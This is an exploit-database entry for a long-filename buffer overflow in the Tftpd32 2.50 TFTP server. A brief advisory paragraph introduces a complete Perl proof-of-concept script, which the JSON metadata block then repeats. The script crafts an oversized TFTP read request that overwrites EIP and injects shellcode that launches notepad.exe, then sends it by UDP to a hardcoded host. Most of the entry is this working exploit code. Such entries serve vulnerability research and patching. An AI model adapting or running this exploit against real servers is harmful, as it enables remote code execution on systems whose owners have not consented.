Search...

TFTPD32 2.50 Long Filename Buffer Overflow Vulnerability

2014-07-01T00:00:00

ID SSV:75838
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/6199/info

A buffer-overflow vulnerability has been reported for Tftpd32. The vulnerability is due to insufficient checks on user-supplied input. 

A remote attacker can exploit this vulnerability by supplying a long string as a name of the file to retrieve. This will trigger the buffer-overflow condition. Any malicious attacker-supplied code will be executed with the privileges of the Tftpd32 process.

#!/usr/bin/perl
#TFTP Server remote Buffer Overflow
use IO::Socket;
$host = &#34;192.168.1.53&#34;;
$port = &#34;69&#34;;
$data = &#34;A&#34;;

#$buf .= &#34;\x00\x02&#34;; # Send ---- Choose one
$buf .= &#34;\x00\x01&#34;; # Recieve

$buf .= &#34;A&#34;;
$num = &#34;116&#34;;
$buf .= $data x $num;
$buf .= &#34;.&#34;;
$num = &#34;140&#34;; # EIP section
$buf .= $data x $num;

$address = &#34;\xFF\xFF\xFF\xFF&#34;;
$buf .= $address;

$egg = &#34;\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2&#34;;
$egg .= &#34;\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7&#34;;
$egg .= &#34;\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C&#34;;
$egg .= &#34;\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB&#34;;
$egg .= &#34;\xFD\xE8\xD4\xFF\xFF\xFF&#34;;
$egg .= &#34;notepad.exe&#34;;

$egg .= &#34;\x90\x90\x90\x90\x90\x90&#34;;
$buf .= $egg;

$buf .= &#34;\x00binary\x00&#34;;

$socket = IO::Socket::INET-&#62;new(Proto =&#62; &#34;udp&#34;) or die &#34;Socket error:
$@\n&#34;;
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die &#34;Can&#39;t send:
$!\n&#34;;
print &#34;Now, &#39;$host&#39; should open up a notepad\n&#34;;

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T14:20:07", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2017-11-19T14:20:07", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:20:07", "rev": 2}, "vulnersScore": 0.3}, "href": "https://www.seebug.org/vuldb/ssvid-75838", "references": [], "enchantments_done": [], "id": "SSV:75838", "title": "TFTPD32 2.50 Long Filename Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n source: http://www.securityfocus.com/bid/6199/info\r\n\r\nA buffer-overflow vulnerability has been reported for Tftpd32. The vulnerability is due to insufficient checks on user-supplied input. \r\n\r\nA remote attacker can exploit this vulnerability by supplying a long string as a name of the file to retrieve. This will trigger the buffer-overflow condition. Any malicious attacker-supplied code will be executed with the privileges of the Tftpd32 process.\r\n\r\n#!/usr/bin/perl\r\n#TFTP Server remote Buffer Overflow\r\nuse IO::Socket;\r\n$host = "192.168.1.53";\r\n$port = "69";\r\n$data = "A";\r\n\r\n#$buf .= "\\x00\\x02"; # Send ---- Choose one\r\n$buf .= "\\x00\\x01"; # Recieve\r\n\r\n$buf .= "A";\r\n$num = "116";\r\n$buf .= $data x $num;\r\n$buf .= ".";\r\n$num = "140"; # EIP section\r\n$buf .= $data x $num;\r\n\r\n$address = "\\xFF\\xFF\\xFF\\xFF";\r\n$buf .= $address;\r\n\r\n$egg = "\\xEB\\x27\\x8B\\x34\\x24\\x33\\xC9\\x33\\xD2\\xB2";\r\n$egg .= "\\x0B\\x03\\xF2\\x88\\x0E\\x2B\\xF2\\xB8\\xAF\\xA7";\r\n$egg .= "\\xE6\\x77\\xB1\\x05\\xB2\\x04\\x2B\\xE2\\x89\\x0C";\r\n$egg .= "\\x24\\x2B\\xE2\\x89\\x34\\x24\\xFF\\xD0\\x90\\xEB";\r\n$egg .= "\\xFD\\xE8\\xD4\\xFF\\xFF\\xFF";\r\n$egg .= "notepad.exe";\r\n\r\n$egg .= "\\x90\\x90\\x90\\x90\\x90\\x90";\r\n$buf .= $egg;\r\n\r\n$buf .= "\\x00binary\\x00";\r\n\r\n$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:\r\n$@\\n";\r\n$ipaddr = inet_aton($host) || $host;\r\n$portaddr = sockaddr_in($port, $ipaddr);\r\nsend($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send:\r\n$!\\n";\r\nprint "Now, '$host' should open up a notepad\\n";\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-75838", "type": "seebug"}